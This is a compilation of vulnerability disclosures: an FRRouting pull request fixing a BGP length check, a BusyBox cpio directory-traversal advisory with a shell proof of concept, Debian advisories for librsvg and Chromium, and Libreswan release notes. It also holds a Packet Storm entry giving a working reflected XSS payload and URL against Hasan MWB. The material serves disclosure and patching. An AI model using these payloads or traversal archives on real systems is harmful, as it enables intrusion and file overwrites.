An issue was discovered in FRRouting FRR 9.0. bgpd/bgp_open.c does not check for an overly large length of the rcv software version.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Merged

donaldsharp merged 1 commit into FRRouting:master from opensourcerouting:fix/software\_version\_capability\_handling\_len

Aug 21, 2023

Merged

**bgpd: Check the length of the rcv software version #14241**

donaldsharp merged 1 commit into FRRouting:master from opensourcerouting:fix/software\_version\_capability\_handling\_len

Aug 21, 2023

+11 −1

Conversation 6 Commits 1 Checks 5 Files changed 1

**Conversation**

Copy link

Member

**

 **ton31337** commented

Aug 20, 2023

**

Make sure we don't exceed the maximum of BGP\_MAX\_SOFT\_VERSION.

The Capability Length SHOULD be no greater than 64.

Reported-by: Iggy Frankovic iggyfran@amazon.com

 frrbot bot added the bgp label

Aug 20, 2023

 github-actions bot added master size/XS labels

Aug 20, 2023

 ton31337 force-pushed the fix/software\_version\_capability\_handling\_len branch from 4ab7b68 to 5e3a269 Compare

August 20, 2023 18:47

 github-actions bot added size/S and removed size/XS labels

Aug 20, 2023

          bgpd: Check the length of the rcv software version
        

          b4d09af
        

Make sure we don't exceed the maximum of BGP\_MAX\_SOFT\_VERSION.

The Capability Length SHOULD be no greater than 64.

Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>

 ton31337 force-pushed the fix/software\_version\_capability\_handling\_len branch from 5e3a269 to b4d09af Compare

August 20, 2023 18:48

Copy link

Member Author

**

**ton31337** commented

Aug 20, 2023

**

@Mergifyio backport stable/9.0

mergify\[bot\] reacted with thumbs up emoji

Copy link

**

**mergify bot** commented

Aug 20, 2023

•

edited



**

> backport stable/9.0

**✅ Backports have been created**

*   #14250 bgpd: Check the length of the rcv software version (backport #14241) has been created for branch stable/9.0

 github-actions bot added the backport label

Aug 20, 2023

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13678/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 arm8 part 9
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 6
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 amd64 part 7
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 3
*   Addresssanitizer topotests part 7
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 arm8 part 5
*   Topotests debian 10 amd64 part 1
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests debian 10 amd64 part 2
*   Static analyzer (clang)
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 18.04 deb pkg check
*   Debian 9 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13679/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 8
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 arm8 part 9
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 amd64 part 4
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Addresssanitizer topotests part 3
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 7
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 7
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 i386 part 0
*   Topotests Ubuntu 18.04 i386 part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   CentOS 7 rpm pkg check
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Static analyzer (clang)
*   Addresssanitizer topotests part 2
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests debian 10 amd64 part 5
*   Ubuntu 18.04 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 i386 part 3: Failed (click for details) Topotests Ubuntu 18.04 i386 part 3: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO3U18I386/TopotestDetails/

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO3U18I386-13680/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 3**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO3U18I386/TopotestLogs/log\_topotests.txt

Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13680/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Addresssanitizer topotests part 0
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 9
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 amd64 part 7
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 i386 part 5
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 3
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   CentOS 7 rpm pkg check
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests debian 10 amd64 part 2
*   Addresssanitizer topotests part 2
*   Static analyzer (clang)
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 1
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Ubuntu 18.04 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 21, 2023

**

**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

 donaldsharp merged commit ff4c767 into FRRouting:master

Aug 21, 2023

6 checks passed

 mergify bot mentioned this pull request

Aug 21, 2023

bgpd: Check the length of the rcv software version (backport #14241) #14250

Merged

 ton31337 deleted the fix/software\_version\_capability\_handling\_len branch

August 21, 2023 13:53

donaldsharp added a commit that referenced this pull request

Aug 21, 2023

          Merge pull request #14250 from FRRouting/mergify/bp/stable/9.0/pr-14241
        

          d8238e9
        

bgpd: Check the length of the rcv software version (backport #14241)

Sign up for free **to join this conversation on GitHub**. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

backport bgp master size/S

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

None yet

3 participants

CVE-2023-41361: bgpd: Check the length of the rcv software version by ton31337 · Pull Request #14241 · FRRouting/frr

An issue in the CPIO command of Busybox v1.33.2 allows attackers to execute a directory traversal.

When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.

**Summary**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, **6.1 Medium**

cpio is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names starting with ../ and this cannot be prevented.

While bsdcpio ignores archived files that have absolut file names or start with ../ and GNU cpio has a parameter to prevent extracting these file names, BusyBox processes archives with such names and there is no parameter to handle potentially untrusted archives.

**Impact**

If untrusted archives are extracted, this may result in writing files outside the destination directory. This could result in files being overwritten that contain configuration in form of shell scripts such as ~/.bashrc or that enable a login from a remote side such as the ~/.ssh/authorized_keys file.

**Timeline**

*   2023-07-24: Vulnerability noticed.
    
*   2023-07-26: Initial contact of BusyBox maintainer via e-mail.
    
*   2023-08-01: Second try to contact BusyBox maintainer via e-mail. First try to contact developer of the module, but e-mail bounced. First contact to Debian security team, because BusyBox package is available via Debian packages.
    
*   2023-08-24: CVE-2023-39810 was assigned.
    
*   2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.
    

**Affected Components**

The issue affects BusyBox cpio in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.

*   BusyBox v1.33.2
    
*   BusyBox v1.30.1
    

**Technical Details**

The processing of relative and absolute file names could result in risks. For example the GNU cpio program was affected by the same vulnerability, referenced as "CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a .. (dot dot) in a cpio file." A patch was developed and added to cpio 2.6-6, which requires an additional parameter --no-absolute-filenames to prevent files being overwritten. This option also works for relative file names. This is still an insecure default, but an improvement.

BusyBox cpio is another implementation, but it has no similar mechanism to avoid the processing of relative files as shown with the proof of concept below:

#!/bin/sh
set -e
echo + Clean-up
rm -rf /tmp/testcase
echo + Create a test archive
mkdir -p /tmp/testcase/a/b/
echo test > /tmp/testcase/testfile
cd /tmp/testcase/a/b/
(echo ../../testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet
rm /tmp/testcase/testfile
echo + Extract archive
mkdir /tmp/testcase/a/b/etc
strace -f busybox cpio -iv < archive.cpio 2>&1 | grep 'hostname\\|testfile' | grep -v read
echo + List files
find /tmp/testcase/

The final find command lists extracted files:

/tmp/testcase/
/tmp/testcase/testfile           <-- extracted rel. file
/tmp/testcase/a
/tmp/testcase/a/b                <-- working directory
/tmp/testcase/a/b/etc
/tmp/testcase/a/b/etc/hostname   <-- extracted abs. file
/tmp/testcase/a/b/archive.cpio   <-- archive to extract

According to the output above, the testfile is written outside of the working directory.

**Precondition**

An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.

**Recommendation**

Pentagrid recommends changing the default behaviour and to ignore relative file names within a cpio archive. To process files with relative file names, a command line flag could be introduced like it was done for GNU cpio.

Users can specify on the BusyBox cpio command line which file name should be unpacked, which should be safe as long as no directory traversal is included in that file name argument.

**Credits**

The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.

CVE-2023-39810: Busybox cpio directory traversal vulnerability (CVE-2023-39810)

Debian Linux Security Advisory 5484-1 - Zac Sims discovered a directory traversal in the URL decoder of librsvg, a SAX-based renderer library for SVG files, which could result in read of arbitrary files when processing a specially crafted SVG file with an include element.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5484-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 27, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librsvgCVE ID         : CVE-2023-38633Debian Bug     : 1041810Zac Sims discovered a directory traversal in the URL decoder of librsvg,a SAX-based renderer library for SVG files, which could result in readof arbitrary files when processing a specially crafted SVG file with aninclude element.For the oldstable distribution (bullseye), this problem has been fixedin version 2.50.3+dfsg-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.54.7+dfsg-1~deb12u1.We recommend that you upgrade your librsvg packages.For the detailed security status of librsvg please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librsvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTrXKhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TYkg//Q+FWCbAqpcLPI+InN0nga0wROM6JVxX3CVPTg6/4U0XKjPRmx4wlX6RvRPk1n4M8I7pjdtXT1PfdVsXpwT1+mFewUkOb4aLkuX5+0NOJbxAS6L6Oo1jNs4r0PJYPcda7edePoIScJ2vH14/yhJs+7ROV3hI0to5CpxT5KejGLTbkhWSs79YMvHxZBPLcSE/NDOCkDzlJ1aVBndmvgqQGujN7hvjynIi8IGEXrPAofqHO1pfVGtBWtK5oajXwxdAU2t0+wy4Lc0U2NPDF6r9QIeZidamJ0yfgPbuiU4WCx1lbkCAMG4Bf6m5S4JqbQmgc+rZCBHy3zaKlipFOEyPe2tfrcvH8zljRXSiKL5P0zMwVeYIRsQj3lUvPge+xV8Gqod99uv4fgN19OWvcP5HOiXxQnkRtReYiQgKut8W0HAXydCsrctAB2XvprYIbsnR1lU8dBAaLqnC/nwrsLVLUv7y1oKDDNjXmNT/aF/ISVF70WVywQK/LbhXIyECoGe+TeoxGjCjT+N/PibL3pMIZ/c8ZLMyH+2+Ad/oD614hPVbe7CUmRCX7Vz2ax8v47b4JY2skki9XdASkKsyvBq9Xus6ZY04D0tTj87wF0Vr4iBAbnFWSJnw2tFVLwn7/ncNkpU/MONR8CAPvhgBc8n/nfF9Fbg6ubEeAHdzlp8EOom8==uwUe-----END PGP SIGNATURE-----

Debian Security Advisory 5484-1

Debian Linux Security Advisory 5483-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5483-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 25, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4427 CVE-2023-4428 CVE-2023-4429 CVE-2023-4430                  CVE-2023-4431Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 116.0.5845.110-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 116.0.5845.110-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTo/EsACgkQEMKTtsN8TjZcVA//SJ88YLHY0KVBwr1CrQJPHHMeP5gyq80A/LRLf7kNco7jcHfZyiR8LB7V4eo62Um8dCpwzSHRqc73Jx580nn5tW310c3C7LQqVPOu0YBmslLkGstXQmR19mHSZkwGGukYMhoNw/ijfAceRjI2ivCnX1MrZyxb6cRH5vJ4Q0KDkSmCi0l2Luv5NHKYTQgprg4u9ls6OtTPu7BiyRClCJmoqrGvizfKSdVjwVdqrckRzZSmKagiXVpsnZacb8LnBluAyUkzPwC+f3Z9RZsDYzC2BeRn6qPhnRCM3C5LWxMAoypoP1Pv15rHz4qQa/pDFl6kiG1W9HD83UgrY0u32MmBgcCoI6c4nQ32Vk3Z+N+ZHO3kECm/Z7mGTLHXrHk4+jgXJV5TE1vnKNypKh7J6JewVFJxMg8Rw4gMRcod3zMNfBe1q9F39NbSRk0F/5LMfTOKZuZmLTuzX/wV3z6B6I1GoFQx7yw9w3vJ9095hdxWxGstedCSv4uinmPfoEzgCiQjRm828sO1Qzfnv+ukgMruhlFc15tbKdLJGu1mflu7AGURs5s1Q1RPMAZbTFcQ8zb7N/PXyiW2VKERuKRKI0+pjLGSoq7W9RU2Er7Mj9huq0T0xpjAkoR1L+nGXvENDNYNg3Yl4eMhHVnP0UzT37F3GEFEfmgAnlL1ziqypGjHvA0==/urs-----END PGP SIGNATURE-----

Debian Security Advisory 5483-1

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

An issue was discovered in Libreswan 3.x and 4.x before 4.12. When an IKEv1 ISAKMP SA Informational Exchange packet contains a Delete/Notify payload followed by further Notifies that act on the ISAKMP SA, such as a duplicated Delete/Notify message, a NULL pointer dereference on the deleted state causes the pluto daemon to crash and restart.

*   Aug 8, 2023
*   273ab05
*   zip
*   tar.gz
*   Notes

*   May 3, 2023
*   cbfa405
*   zip
*   tar.gz
*   Notes

*   Mar 1, 2023
*   b681175
*   zip
*   tar.gz

v4.9 (October 13, 2022)

\* IKEv1: fix crasher (introduced in 4.8) when USE\_NSS\_KDF=false or MD5 \[Andrew\]
\* IKEv2: fix RFC 8229 IKE/ESP over IPv6 TCP \[Andrew\]

*   Oct 14, 2022
*   394c823
*   zip
*   tar.gz

v4.8 (October 2, 2022)

\* release: remove SHA1 bindings from LIBRESWAN OpenPGP key \[dkg/Paul\]
\* pluto: ignore obsoleted unused interfaces= / --iface \[Paul/Andrew\]
\* pluto: various internal crypto struct changes \[Andrew\]
\* pluto: fix traffic counters for AH and IPCOMP \[Andrew\]
\* pluto: improve logging of duplicate serial cert error \[Andrew\]
\* pluto: support for maxbytes/maxpacket counters \[Antony/Paul\]
\* pluto: handle HW tokens using strange CKAIDs; github/815 \[Andrew\]
\* pluto: added --ipsec-max-bytes / --ipsec-max-packets support \[Antony\]
\* libipsecconf: added ipsec-max-bytes= and ipsec-max-packets= options \[Paul\]
\* IKEv2: emit one CERTREQ payload with all the hashes \[Andrew\]
\* addconn/whack: add support for {left,right}pubkey= \[Andrew\]
\* showhostkey: add support for ECDSA pubkeys \[Andrew\]
\* Crypto: add KDF self tests \[Daiki Ueno\]
\* IPv6: open IPv6 IKE port 4500; github/800 \[Andrew\]
\* showhostkey: add --pem option to print PEM encoded public key \[Andrew\]
\* unbound: \_unbound-hook converted from python to shell \[Andrew\]
\* BSD: delete old BSDKAME code replaced by PFKEYV2 code \[Andrew\]
\* BSD: fix replay window byte vs bit math \[Andrew\]
\* BSD: fix code finding interfaces; github/728 \[Andrew\]
\* FreeBSD: support large replay window; github/756 \[Andrew\]
\* FreeBSD: support ESN; github/721 \[Andrew\]
\* linux: update copy of xfrm.h header \[Paul\]
\* packaging: update fedora spec file \[Paul/Tuomo\]
\* building: on BSD, always use GCC; freebsd/264288 llvm/55963 \[Andrew\]
\* building: enable LTO when USE\_LTO=true; github/836 github/834 \[Andrew\]
\* building: dropped default build and packaging support for:
  	    Fedora 22, 28, 29, 30
            Debian stretch
            Ubuntu cosmic, xenial
            RHEL6 was removed in v4.5
            Add SUSE, Arch, Mint

*   Oct 3, 2022
*   be225bf
*   zip
*   tar.gz

v4.7 (May 24, 2022)

\* IKEv2: EAPTLS support \[Timo Teräs / Andrew\]
\* IKEv2: EAPONLY support \[Andrew\]
\* IKEv2: fix interop when IPCOMP+transport-mode \[Andrew\]
\* IKEv2: fix race between new IKE SA and liveness \[Andrew\]
\* IKEv2: fix interop with Android 12 + certificates \[Andrew\]
\* IKEv1: reject IKEv2 only authby=secret+rsasig \[Andrew\]
\* config: end keywords with no left/right prefix are applied to both ends
\* kernel: fix double delete of kernel policy when tearing down SA \[Andrew\]
\* kernel: fix deleting policy when an XFRMi FD ID; github/618 \[Andrew\]
\* kernel: general cleanups \[Andrew\]
\* \_stackmanager / pluto: support Ubuntu 18.04 LTS kernels \[Paul\]
\* FreeBSD: libreswan builds out-of-the-box \[Andrew\]
\* BSD: Add IPv6 support (tested on NetBSD)
\* building: fix build on fedora rawhide \[Paul\]
\* internals: initiate IKEv2 CREATE\_CHILD\_SA exchange using IKE SA \[Andrew\]
\* internals: \_updown.bsdkame renamed to \_updown.bsd

*   May 24, 2022
*   19eabcd
*   zip
*   tar.gz

v4.6 (January 11, 2022)

\* SECURITY: Fixes CVE-2022-23094 https://libreswan.org/security/CVE-2022-23094
\* IKEv2: aggressively check incoming fragments \[Andrew\]
\* IKEv2: when rekeying and PFS, only propose/allow original crypt-suite \[Andrew\]
\* IKEv2: when PFS, don't repeatedly log all proposals \[Andrew\]
\* IKEv2: Labeled IPsec improvements \[Andrew\]
\* IKEv1: support for ISAKMP\_N\_CISCO\_LOAD\_BALANCE removed \[Andrew\]
\* pluto: Revamp the host connection lookup mechanism \[Andrew\]
\* pluto: Change default replay-window from 32 to 128 \[Paul\]
\* pluto: Change default esn= to "either" and prefer "yes" \[Paul\]
\* pluto: Disable esn when replay-window=0 \[Paul\]
\* pluto: Drop obsolete debug options such as crypto-low \[Andrew\]
\* seccomp: Updated syscall allow-list \[Paul\]
\* packaging: replace old SUSE packaging with pointer to downstream \[Andrew\]
\* NetBSD: Don't use ESN - not supported by kernel \[Andrew\]
\* letsencrypt: Fix bashisms in letsencrypt script \[dkg\]
\* libipsecconf: allow leftauth=ecdsa|rsa (match authby= values) \[Paul\]
\* testing: significantly improved testing \[Andrew, Paul\]

*   Jan 12, 2022
*   5cb4ea7
